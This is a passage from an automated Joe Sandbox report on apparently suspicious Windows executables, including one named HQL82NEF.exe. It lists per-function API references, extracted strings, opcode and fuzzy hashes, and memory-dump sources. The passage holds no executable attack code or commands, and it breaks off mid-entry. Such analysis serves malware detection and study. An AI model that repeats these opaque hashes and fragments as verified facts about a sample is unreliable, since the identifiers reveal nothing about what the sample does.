String ID: WireGuard-Fetcher/1.0 (Windows %lu.%lu.%lu; %s)$WireGuard-Fetcher/1.0 (Windows 10.0.17134; amd64)
API String ID: 3802975332-3721991042
Opcode ID: df46af6619f71c73c6f1c960015f98b9bd13833088626e9cdad5c71da5e07ecd
Instruction ID: c340d2a0d56e1ae33364edc9bf3680fc278da8f918a3f901ec46eece927b3142
Opcode Fuzzy Hash: df46af6619f71c73c6f1c960015f98b9bd13833088626e9cdad5c71da5e07ecd
Instruction Fuzzy Hash: 36F020765022147BD3216715AC89EC3BF2CDBCAB70F100246FAA4221D2C2200905C3B1

Uniqueness

Uniqueness Score: -1.00%

Function 00302440 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 290COMMON

Download Yara Rule

Strings

pI^t, xrefs: 003027C1

Memory Dump Source

Source File: 00000002.00000002.636618839.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true

Associated: 00000002.00000002.636613469.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636625601.000000000030B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636630549.000000000030D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636630549.0000000000311000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636635815.0000000000313000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_300000_7ABGVF6Q.jbxd

Similarity

API ID:
String ID: pI^t
API String ID: 0-1180699696
Opcode ID: 9694ada71237b5d4c8d95dc20a52930b8b6a46eff5ef9f518a5d005096e17c6f
Instruction ID: a1ae329aa84e35fe626b4c9665db6e9012f2f20a97a0a0832b50231e56ff3ca4
Opcode Fuzzy Hash: 9694ada71237b5d4c8d95dc20a52930b8b6a46eff5ef9f518a5d005096e17c6f
Instruction Fuzzy Hash: FDC1F43290A7558BC722CF18C8A4266F7A1BF95318F1A865DDCA827393D730F985C791

Uniqueness

Uniqueness Score: -1.00%

Function 00301660 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 152memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,0093FBE0,?,?,?,?,?,?,?,?,?,0030D1A0,?,?,?,00301237), ref: 0030177E

Strings

Unknown pseudo relocation protocol version %d., xrefs: 003017A2
Unknown pseudo relocation bit size %d., xrefs: 0030184D

Memory Dump Source

Source File: 00000002.00000002.636618839.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true

Associated: 00000002.00000002.636613469.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636625601.000000000030B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636630549.000000000030D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636630549.0000000000311000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636635815.0000000000313000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_300000_7ABGVF6Q.jbxd

Similarity

API ID: ProtectVirtual
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
API String ID: 544645111-395989641
Opcode ID: d4e11206cbe20a6f9face21b2e4d0f4898073440694f5a64753fe07d09e68e7f
Instruction ID: a0ca4055396a097c605276a1235ef58df8e2de23cca687b0313a93cbdfe9c844
Opcode Fuzzy Hash: d4e11206cbe20a6f9face21b2e4d0f4898073440694f5a64753fe07d09e68e7f
Instruction Fuzzy Hash: 4D51C371602600CFC72ACF18D8F5B66B3F9FB45314F18865AE94A8B6E5D731E844CB51

Uniqueness

Uniqueness Score: -1.00%

Function 003015E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00301635

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 0030162D
Unknown error, xrefs: 003015EE

Memory Dump Source

Source File: 00000002.00000002.636618839.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true

Associated: 00000002.00000002.636613469.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636625601.000000000030B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636630549.000000000030D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636630549.0000000000311000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636635815.0000000000313000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_300000_7ABGVF6Q.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: 0c9fd36a80720066f38b52c171b09919184ccfb799dd7851240bf10f24ffc286
Instruction ID: fd1f935512c1b4de872f9c87870727ed3692f2c4046fa3b689e78fbec8ec0737
Opcode Fuzzy Hash: 0c9fd36a80720066f38b52c171b09919184ccfb799dd7851240bf10f24ffc286
Instruction Fuzzy Hash: 0AF0907180AB429BC305DF28D46511AF7F0FF99350F418A0EF88857241D734A9D0CB82

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: HQL82NEF.exePID: 5160, Parent PID: 7080COMMON

Execution Graph

Execution Coverage:	18.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.7%
Total number of Nodes:	258
Total number of Limit Nodes:	13

Executed Functions

Function 070B0040 Relevance: 98.1, APIs: 7, Strings: 45, Instructions: 7140COMMON

Download Yara Rule

Strings

PHXq, xrefs: 070B2865
PHXq, xrefs: 070B5199
LRXq, xrefs: 070B0097
PHXq, xrefs: 070B67B3
PHXq, xrefs: 070B21C1
PHXq, xrefs: 070B251E
PHXq, xrefs: 070B3F96
PHXq, xrefs: 070B250A
PHXq, xrefs: 070B049D
PHXq, xrefs: 070B489E
PHXq, xrefs: 070B3C4F
PHXq, xrefs: 070B1E78
PHXq, xrefs: 070B4549
PHXq, xrefs: 070B580E
PHXq, xrefs: 070B455D
PHXq, xrefs: 070B1E8C
PHXq, xrefs: 070B60F5
PHXq, xrefs: 070B645E
PHXq, xrefs: 070B0804
PHXq, xrefs: 070B2BCE
PHXq, xrefs: 070B3216
PHXq, xrefs: 070B17E9
PHXq, xrefs: 070B644A
PHXq, xrefs: 070B2BBA
PHXq, xrefs: 070B57FA
PHXq, xrefs: 070B0B41
PHXq, xrefs: 070B21D5
PHXq, xrefs: 070B7411
PHXq, xrefs: 070B2879
PHXq, xrefs: 070B1B26
PHXq, xrefs: 070B3C3B
PHXq, xrefs: 070B73FD
PHXq, xrefs: 070B6109
LRXq, xrefs: 070B006C
PHXq, xrefs: 070B3875
PHXq, xrefs: 070B3FAA
PHXq, xrefs: 070B51AD
PHXq, xrefs: 070B48B2
PHXq, xrefs: 070B3889
PHXq, xrefs: 070B70BC
PHXq, xrefs: 070B14AC
PHXq, xrefs: 070B3202
PHXq, xrefs: 070B679F
PHXq, xrefs: 070B0E7E
PHXq, xrefs: 070B70A8

Memory Dump Source

Source File: 00000003.00000002.1133351069.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70b0000_HQL82NEF.jbxd

Similarity

API ID:
String ID: LRXq$LRXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq
API String ID: 0-3597570233
Opcode ID: 66815946437b5c39baadfb4ff7eb9b0a27d6d2f1cb5e98b929e7cad98b6dd103
Instruction ID: f867a67ea34a950079abdb321953294bac632ac4680e5040c62460d0c50a10e4
Opcode Fuzzy Hash: 66815946437b5c39baadfb4ff7eb9b0a27d6d2f1cb5e98b929e7cad98b6dd103
Instruction Fuzzy Hash: 5DD31874B0021A8FDB68EF25D964B6E77B2BF88701F1485A9D40997398DF359E81CF80

Uniqueness

Uniqueness Score: -1.00%

Function 06783BE0 Relevance: 2.4, APIs: 1, Instructions: 876COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 06783DCF

Memory Dump Source

Source File: 00000003.00000002.1132701210.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6780000_HQL82NEF.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 2350f43b24780c86512c16c34e9893ddb7d03cb2661294e5010565a6d77c4c73
Instruction ID: 8d8c407f04ec3ec88161eea7df5557f38c9629c63aa7078f4b7ffccfbced643e
Opcode Fuzzy Hash: 2350f43b24780c86512c16c34e9893ddb7d03cb2661294e5010565a6d77c4c73
Instruction Fuzzy Hash: 7162F034B402468FDB59BBB8D86433E3AE2AFD4714F248469D40ACB399DF759C02C796

Uniqueness

Uniqueness Score: -1.00%

Function 06783BD1 Relevance: 2.2, APIs: 1, Instructions: 679COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1132701210.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6780000_HQL82NEF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94c34ee0aa1cbad090233a8e42cde6b5b04afa3cec433064889eaa61d1b21a24
Instruction ID: 8b5b45c61f797c906f0f8c03a59a7801504dcff3886b191edb8a23ea0c3cfd3d
Opcode Fuzzy Hash: 94c34ee0aa1cbad090233a8e42cde6b5b04afa3cec433064889eaa61d1b21a24
Instruction Fuzzy Hash: 6732CD34B402069FDB59BB78D86833E3AA3AFD4718F248469D406CB399DF759C02C796

Uniqueness

Uniqueness Score: -1.00%

Function 06EAC978 Relevance: 1.8, APIs: 1, Instructions: 339libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 06EAC9CC

Memory Dump Source

Source File: 00000003.00000002.1133192242.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ea0000_HQL82NEF.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9c682a4c3e3cc4495974d1c051d6f865b7ab69b2187b527374d47c7c25dddbca
Instruction ID: 0fad16a5a1650abc6d584a668a44b8d97bbbd3287d39cb0eefe68e304f6da6fc
Opcode Fuzzy Hash: 9c682a4c3e3cc4495974d1c051d6f865b7ab69b2187b527374d47c7c25dddbca
Instruction Fuzzy Hash: B8D16234B003198BCB48EBB8D8946ADBBB2FF88715F248529D406EB355DB35EC91CB51

Uniqueness

Uniqueness Score: -1.00%

Function 06EAC977 Relevance: 1.8, APIs: 1, Instructions: 320libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 06EAC9CC

Memory Dump Source

Source File: 00000003.00000002.1133192242.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ea0000_HQL82NEF.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 135743a432fa99abadee363a6459f8246fc4df086ba941a0ab82203e585cb4a5
Instruction ID: e0d75833c94635b6cab0668f90564e8c2fa258fe8d30c759bf4f275a8d2c518d
Opcode Fuzzy Hash: 135743a432fa99abadee363a6459f8246fc4df086ba941a0ab82203e585cb4a5
Instruction Fuzzy Hash: 9BC15234B003198BCB48EBB8D4946ADBBB2BF88705F248519D406EB395DB35EC91CB51

Uniqueness

Uniqueness Score: -1.00%

Function 013DAC70 Relevance: 1.6, APIs: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,00000000), ref: 013DADAB

Memory Dump Source

Source File: 00000003.00000002.1129888849.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13d0000_HQL82NEF.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 90bc26ab100449ec27e5241d02de265918f20f95b2b15281eaeec2fdfc340c7c
Instruction ID: 8342d88e97a88cf3742225f4cdc202a61bcf3bd7f5625c7ee1e7338c80cadc8d
Opcode Fuzzy Hash: 90bc26ab100449ec27e5241d02de265918f20f95b2b15281eaeec2fdfc340c7c
Instruction Fuzzy Hash: AA5143B1E102188FDB18CFA9D994B9DFBF5BF48318F14801AE819AB390D774A844CF95

Uniqueness

Uniqueness Score: -1.00%

Function 06786280 Relevance: 1.6, APIs: 1, Instructions: 117libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 06786380

Memory Dump Source

Source File: 00000003.00000002.1132701210.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6780000_HQL82NEF.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1f3b7ef4367280bfef07d5145582efaff7deca0ca240a8260208a7e60018ab46
Instruction ID: 9c113caaf46c1381cca3b95e94f12e22b9bda3b1efc8e485c14a498a7eb6e174
Opcode Fuzzy Hash: 1f3b7ef4367280bfef07d5145582efaff7deca0ca240a8260208a7e60018ab46
Instruction Fuzzy Hash: 2B414F74E40605DFD768FF34D9A462E76B2FBC4344B20892AD91AC6658DB31EA41CB80

Uniqueness

Uniqueness Score: -1.00%

Function 070B51CB Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 247libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 070B5215
LdrInitializeThunk.NTDLL ref: 070B52CA

Strings

PHXq, xrefs: 070B580E
PHXq, xrefs: 070B57FA

Memory Dump Source

Source File: 00000003.00000002.1133351069.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70b0000_HQL82NEF.jbxd

Similarity

API ID: InitializeThunk
String ID: PHXq$PHXq
API String ID: 2994545307-1791113692
Opcode ID: b7ef9f7cede464f72bebbaa1545ee4a2c091d94de9ccf023748cee23bfed4d68
Instruction ID: f1769bc59451f5936e5b9f36e6f9131be057cbfd8206e08116b4134930f42b7d
Opcode Fuzzy Hash: b7ef9f7cede464f72bebbaa1545ee4a2c091d94de9ccf023748cee23bfed4d68
Instruction Fuzzy Hash: 07A12A74B0021A8FDB28EB24D9647AE77F2BF94705F1485A9D809D7398DB358E81CF80

Uniqueness

Uniqueness Score: -1.00%

Function 070B51C2 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 242libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 070B5215
LdrInitializeThunk.NTDLL ref: 070B52CA

Strings

PHXq, xrefs: 070B580E
PHXq, xrefs: 070B57FA

Memory Dump Source

Source File: 00000003.00000002.1133351069.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70b0000_HQL82NEF.jbxd

Similarity

API ID: InitializeThunk
String ID: PHXq$PHXq
API String ID: 2994545307-1791113692
Opcode ID: dfe81a35bc9bc936d185fe498d7ceed84941385e77b10091702502866579621f
Instruction ID: a396e66978b4dde5f14cea8609eb69f16267a8a7a4e6e9ad7c789121bfc92f48
Opcode Fuzzy Hash: dfe81a35bc9bc936d185fe498d7ceed84941385e77b10091702502866579621f
Instruction Fuzzy Hash: 9DA11C74B0021A8FDB28EB24D9647AE77F2BF94705F1485A9D909D7398DB358E81CF80

Uniqueness

Uniqueness Score: -1.00%

Function 070B3FC8 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 215COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 070B3FEB
KiUserExceptionDispatcher.NTDLL ref: 070B3FF9

Strings

PHXq, xrefs: 070B4549
PHXq, xrefs: 070B455D

Memory Dump Source

Source File: 00000003.00000002.1133351069.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70b0000_HQL82NEF.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID: PHXq$PHXq
API String ID: 6842923-1791113692
Opcode ID: 1cfc52fd682e1876cebbd8843661ae71b280a9919e5fd858225434d4c5a2c323
Instruction ID: 932d6bcd48dabd5817ad3db6a6a3951e9164d8778980cb78e99ad8ca306f9bcf
Opcode Fuzzy Hash: 1cfc52fd682e1876cebbd8843661ae71b280a9919e5fd858225434d4c5a2c323
Instruction Fuzzy Hash: CD817D34B002258FDB68AB35DC6476E76F2BF84701F1485A9E50AE7389DF358E81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 070B3FBF Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 210COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 070B3FEB
KiUserExceptionDispatcher.NTDLL ref: 070B3FF9

Strings

PHXq, xrefs: 070B4549
PHXq, xrefs: 070B455D

Memory Dump Source

Source File: 00000003.00000002.1133351069.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70b0000_HQL82NEF.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID: PHXq$PHXq
API String ID: 6842923-1791113692
Opcode ID: fa5b5ff1a0e47dffc24b633c215f2c112f62c4122cae9d082a2915a0cd1666fc
Instruction ID: b50e0bd2bb4dce219407cb65dfc99d766dada455c872c1b41c38acc52884782a
Opcode Fuzzy Hash: fa5b5ff1a0e47dffc24b633c215f2c112f62c4122cae9d082a2915a0cd1666fc
Instruction Fuzzy Hash: DD817F74B002258FDB68AB25DC6476E76F2BF84701F14C5A9E40AE7399DF358E81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 067822D8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 06782356
GetCurrentThread.KERNEL32 ref: 06782393
GetCurrentProcess.KERNEL32 ref: 067823D0
GetCurrentThreadId.KERNEL32 ref: 06782429

Memory Dump Source

Source File: 00000003.00000002.1132701210.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6780000_HQL82NEF.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: b847e84de2b4df451aa3bb84c0b45100bb4652b8ad7adc3df1dd439de20e9eb4
Instruction ID: eee792628a71483c0ae76d57280a38e85959ff62ed62911d13bea4fc22fbed1d
Opcode Fuzzy Hash: b847e84de2b4df451aa3bb84c0b45100bb4652b8ad7adc3df1dd439de20e9eb4
Instruction Fuzzy Hash: 275168B09002098FDB54DFAAD948BAEBFF1EF88305F208459E019A7351D7349D45CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 06EAA338 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 150
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 06EAA397

Strings

LRXq, xrefs: 06EAA3CE
LRXq, xrefs: 06EAA433

Memory Dump Source

Source File: 00000003.00000002.1133192242.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ea0000_HQL82NEF.jbxd

Similarity

API ID: InitializeThunk
String ID: LRXq$LRXq
API String ID: 2994545307-3325258715
Opcode ID: e404c6dc953956bc2456dbb0e77cc82878d9e60314917e53bed78c34f4bba5b9
Instruction ID: 321da5135bdb889b1bbb181976e8a24bed7dd4803a0d234202027bc5c6f78621
Opcode Fuzzy Hash: e404c6dc953956bc2456dbb0e77cc82878d9e60314917e53bed78c34f4bba5b9
Instruction Fuzzy Hash: 34518C30B003059FCB48EB78D8A4AAEB7F6BF98604B148569E506DB385DF31AC05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06EAA32F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 142
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 06EAA397

Strings

LRXq, xrefs: 06EAA3CE
LRXq, xrefs: 06EAA433

Memory Dump Source

Source File: 00000003.00000002.1133192242.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ea0000_HQL82NEF.jbxd

Similarity

API ID: InitializeThunk
String ID: LRXq$LRXq
API String ID: 2994545307-3325258715
Opcode ID: 5be67c7cb3ba5b2b2ba14a672d4973367fb9d2e6e8397ece852a8ad323a074da
Instruction ID: 2d07100e27201f6642690a194152c449e432fb185d59622b328c15f8eb7b8daa
Opcode Fuzzy Hash: 5be67c7cb3ba5b2b2ba14a672d4973367fb9d2e6e8397ece852a8ad323a074da
Instruction Fuzzy Hash: 9E516E30B003099FCB48EB78D894AAEB7F6BB98604F148579E506DB385DF31AC45CB95

Uniqueness

Uniqueness Score: -1.00%

Function 070B4E76 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 139libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 070B4E99
LdrInitializeThunk.NTDLL ref: 070B5215
LdrInitializeThunk.NTDLL ref: 070B52CA

Strings

PHXq, xrefs: 070B5199
PHXq, xrefs: 070B51AD

Memory Dump Source

Source File: 00000003.00000002.1133351069.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70b0000_HQL82NEF.jbxd

Similarity

API ID: InitializeThunk$DispatcherExceptionUser
String ID: PHXq$PHXq
API String ID: 48014773-1791113692
Opcode ID: 04d14b9e7e78a9fa2459d08c943b01fc9f1ad9330d45269450e4c3cc8fd3a01f
Instruction ID: 40da46db9a17b3f15d3b0f7f03b9d99fb5dd4d1591a800472245a0ef81ddd0b1
Opcode Fuzzy Hash: 04d14b9e7e78a9fa2459d08c943b01fc9f1ad9330d45269450e4c3cc8fd3a01f
Instruction Fuzzy Hash: E6516D74B002168FDB68AB359D6476E76F6BFC4701F1485A9D40AE7398DF358E81CB80

Uniqueness

Uniqueness Score: -1.00%

Function 070B5DD2 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 139
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 070B5DF5

Strings

PHXq, xrefs: 070B60F5
PHXq, xrefs: 070B6109

Memory Dump Source

Source File: 00000003.00000002.1133351069.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70b0000_HQL82NEF.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID: PHXq$PHXq
API String ID: 6842923-1791113692
Opcode ID: ec326cc20f0bd10ba220d6790f0dcb78fec47e9bdfd8f21948f5d07534ad466f
Instruction ID: a83734470c30512f471681d194650080d7dab0b05d6db8305ff40978803e19df
Opcode Fuzzy Hash: ec326cc20f0bd10ba220d6790f0dcb78fec47e9bdfd8f21948f5d07534ad466f
Instruction Fuzzy Hash: 50516E74B002198FCB68AB759D6476E7AF2BF88700F1485A9D40AD7398DF358E41CF80

Uniqueness

Uniqueness Score: -1.00%

Function 070B4E6D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 070B4E99
LdrInitializeThunk.NTDLL ref: 070B5215
LdrInitializeThunk.NTDLL ref: 070B52CA

Strings

PHXq, xrefs: 070B5199
PHXq, xrefs: 070B51AD

Memory Dump Source

Source File: 00000003.00000002.1133351069.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70b0000_HQL82NEF.jbxd

Similarity

API ID: InitializeThunk$DispatcherExceptionUser
String ID: PHXq$PHXq
API String ID: 48014773-1791113692
Opcode ID: e6190899b6179283114d35604f0605ee6a9fa68d010a9078a0b8d06eb0fe37e5
Instruction ID: 665c9f9ce1303e173a6fcd21ae6cb0f1a107e2b0cc9e8a1594597808fc02ed59
Opcode Fuzzy Hash: e6190899b6179283114d35604f0605ee6a9fa68d010a9078a0b8d06eb0fe37e5
Instruction Fuzzy Hash: 50513D74B002168FDB68AB259D6476E76F6BFC4701F14C5A9D40AE7398DF358E81CB80

Uniqueness

Uniqueness Score: -1.00%

Function 070B5DC9 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 070B5DF5

Strings

PHXq, xrefs: 070B60F5
PHXq, xrefs: 070B6109

Memory Dump Source

Source File: 00000003.00000002.1133351069.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70b0000_HQL82NEF.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID: PHXq$PHXq
API String ID: 6842923-1791113692
Opcode ID: 32e6d153301864d957d688889e842a96a6179459afd6a16eb02280483b9e925e
Instruction ID: 007e84fe9434b22f1e32d4b2bab23f11fe0861e8a552ecbb51863e21bc59d2e5
Opcode Fuzzy Hash: 32e6d153301864d957d688889e842a96a6179459afd6a16eb02280483b9e925e
Instruction Fuzzy Hash: 76516E74B002168FDB68AB659D6476E7AF2BF88701F1485A9D40AD7398DF358E81CF80

Uniqueness

Uniqueness Score: -1.00%

Function 074A4040 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32(00000050), ref: 074A40D3

Strings

4'Xq, xrefs: 074A408C

Memory Dump Source

Source File: 00000003.00000002.1133444946.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_74a0000_HQL82NEF.jbxd

Similarity

API ID: MetricsSystem
String ID: 4'Xq
API String ID: 4116985748-913274489
Opcode ID: 55b42347bdf4a1bef8ef883907db0de4b005a2e565381231cdc3b065230f4d45
Instruction ID: 7845b876a7e154638d7e3ac5bdbc6d327d34dc16362baf2fa725fce6efbac84c
Opcode Fuzzy Hash: 55b42347bdf4a1bef8ef883907db0de4b005a2e565381231cdc3b065230f4d45
Instruction Fuzzy Hash: 6C2157B080434ADFCB01DFAAD4446EEBFF4AB09314F14885AE459A7381D7346945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 074A4050 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32(00000050), ref: 074A40D3

Strings

4'Xq, xrefs: 074A408C

Memory Dump Source

Source File: 00000003.00000002.1133444946.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_74a0000_HQL82NEF.jbxd

Similarity

API ID: MetricsSystem
String ID: 4'Xq
API String ID: 4116985748-913274489
Opcode ID: f96545461046d1d86e5384b64c94a96703cf79e466698bcfaad6056fb7735f9f
Instruction ID: 21852cdd68e731332cde0c5f5ffe88c56add4bc15c0a7e64019d68fc012e5da1
Opcode Fuzzy Hash: f96545461046d1d86e5384b64c94a96703cf79e466698bcfaad6056fb7735f9f
Instruction Fuzzy Hash: C32125B0C0424ADFCB10DF9AD5456EEBBF4EB48324F10895AD419A7380CB746944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 013DD010 Relevance: 1.8, APIs: 1, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1129888849.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13d0000_HQL82NEF.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 993f69ce244c9422055eaae86caa5c989d2886641dd7a4a923dd04df097c355f
Instruction ID: 15a6e61dd382f2b4c3a0843d0876cd18053602d3a84847409c466e387d015808
Opcode Fuzzy Hash: 993f69ce244c9422055eaae86caa5c989d2886641dd7a4a923dd04df097c355f
Instruction Fuzzy Hash: E7B1AD71A007068FCB04EFBDD490A6EBBF2FF88214B048A29D44ADB755DB34E905CB94

Uniqueness

Uniqueness Score: -1.00%

Function 06EAB420 Relevance: 1.7, APIs: 1, Instructions: 175libraryCOMMON

Download Yara Rule

APIs

